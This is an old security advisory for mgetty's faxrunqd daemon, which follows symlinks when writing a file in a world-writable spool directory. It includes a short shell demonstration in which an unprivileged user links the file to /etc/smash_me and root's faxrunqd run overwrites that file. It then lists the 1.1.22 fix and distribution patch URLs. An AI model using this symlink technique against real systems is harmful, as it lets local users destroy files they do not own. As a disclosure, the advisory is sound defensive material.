COMMAND
mgetty
SYSTEMS AFFECTED
mgetty 1.1.21 and prior (at least back to 1994)
PROBLEM
Stan Bubrouski found following. faxrunqd follows symbolic links
when creating certain files. The default location for the files
is /var/spool/fax/outgoing, which is a world-writable directory.
Local users can destroy the contents of any file on a mounted
filesystem because faxrunqd is usually run by root.
mgetty comes with a program named faxrunqd, which is a daemon to
send fax jobs queued by faxspool(1). Upon successful execution,
a file named .last_run is created in the /var/spool/fax/outgoing/
directory which is world-writable. The problem lies in the fact
faxrunqd will follow symlinks created by any user, allowing file
creation anywhere and allowing existing files to be
overwritten/destroyed. Example:
Remote unprivilaged user:
[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:46 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
Root console:
[root@king /tmp]# faxrunqd -l ttyS0
...
Remote unprivilaged user:
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd
[user@king /tmp]$
Original report about this can be found at:
http://oliver.efri.hr/~crv/security/bugs/Linux/various.html
SOLUTION
First of all, this hole does NOT exist anymore in 1.1.22. It has
been reported to me by the FreeBSD people, and closed on August
14, 2000. 1.1.22 has been released on August 17, 2000, and can
be found on the usual places (http://alpha.greenie.net/mgetty/).
If you are using the "sendfax" part of mgetty+sendfax AND you
have possibly-malicious users on your system, then you should
urgently upgrade to 1.1.22 (which should be a matter of "make;
make install").
Looks like someone else realized this at least a couple weeks ago.
$ make
===> mgetty-1.1.21 is marked as broken: insecure tempfile handling: can overwrite any file on the system.
The OpenBSD cvs log shows:
----------------------------
revision 1.17
date: 2000/08/15 19:38:18; author: brad; state: Exp; lines: +2 -2
even better reason why this should be marked BROKEN,
insecure tempfile handling: can overwrite any file on the system
----------------------------
For Caldera Systems:
- OpenLinux Desktop 2.3
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/mgetty-1.1.22_Aug17-2OL.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS/mgetty-1.1.22_Aug17-2OL.src.rpm
- OpenLinux eServer 2.3 and OpenLinux eBuilder for ECential 3.0
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/mgetty-1.1.22_Aug17-2S.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS/SRPMS/mgetty-1.1.22_Aug17-2S.src.rpm
- OpenLinux eDesktop 2.4
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/mgetty-1.1.22_Aug17-2.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS/mgetty-1.1.22_Aug17-2.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mgetty-voice-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/mgetty-1.1.22-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-sendfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-viewfax-1.1.22-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mgetty-voice-1.1.22-1cl.i386.rpm
For Linux-Mandrake:
Linux-Mandrake 6.0: 6.0/RPMS/mgetty-1.1.22-2mdk.i586.rpm
6.0/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
6.0/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
6.0/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
6.0/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
6.0/SRPMS/mgetty-1.1.22-2mdk.src.rpm
Linux-Mandrake 6.1: 6.1/RPMS/mgetty-1.1.22-2mdk.i586.rpm
6.1/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
6.1/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
6.1/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
6.1/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
6.1/SRPMS/mgetty-1.1.22-2mdk.src.rpm
Linux-Mandrake 7.0: 7.0/RPMS/mgetty-1.1.22-2mdk.i586.rpm
7.0/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
7.0/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
7.0/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
7.0/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
7.0/SRPMS/mgetty-1.1.22-2mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/mgetty-1.1.22-2mdk.i586.rpm
7.1/RPMS/mgetty-contrib-1.1.22-2mdk.i586.rpm
7.1/RPMS/mgetty-sendfax-1.1.22-2mdk.i586.rpm
7.1/RPMS/mgetty-viewfax-1.1.22-2mdk.i586.rpm
7.1/RPMS/mgetty-voice-1.1.22-2mdk.i586.rpm
7.1/SRPMS/mgetty-1.1.22-2mdk.src.rpm
For RedHat:
ftp://updates.redhat.com/5.2/sparc/mgetty-voice-1.1.22-1.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/mgetty-viewfax-1.1.22-1.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/mgetty-sendfax-1.1.22-1.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/mgetty-1.1.22-1.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/alpha/mgetty-voice-1.1.22-1.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/mgetty-viewfax-1.1.22-1.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/mgetty-sendfax-1.1.22-1.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/mgetty-1.1.22-1.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/i386/mgetty-voice-1.1.22-1.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/mgetty-viewfax-1.1.22-1.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/mgetty-sendfax-1.1.22-1.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/mgetty-1.1.22-1.5.x.i386.rpm
ftp://updates.redhat.com/5.2/SRPMS/mgetty-1.1.22-1.5.x.src.rpm
ftp://updates.redhat.com/6.2/sparc/mgetty-voice-1.1.22-1.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/mgetty-viewfax-1.1.22-1.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/mgetty-sendfax-1.1.22-1.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/mgetty-1.1.22-1.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/i386/mgetty-voice-1.1.22-1.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/mgetty-viewfax-1.1.22-1.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/mgetty-sendfax-1.1.22-1.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/mgetty-1.1.22-1.6.x.i386.rpm
ftp://updates.redhat.com/6.2/alpha/mgetty-voice-1.1.22-1.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/mgetty-viewfax-1.1.22-1.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/mgetty-sendfax-1.1.22-1.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/mgetty-1.1.22-1.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/SRPMS/mgetty-1.1.22-1.6.x.src.rpm
For FreeBSD:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/comms/mgetty-1.1.22.8.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/comms/mgetty-1.1.22.8.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/comms/mgetty-1.1.22.8.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/comms/mgetty-1.1.22.8.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/comms/mgetty-1.1.22.8.17.tgz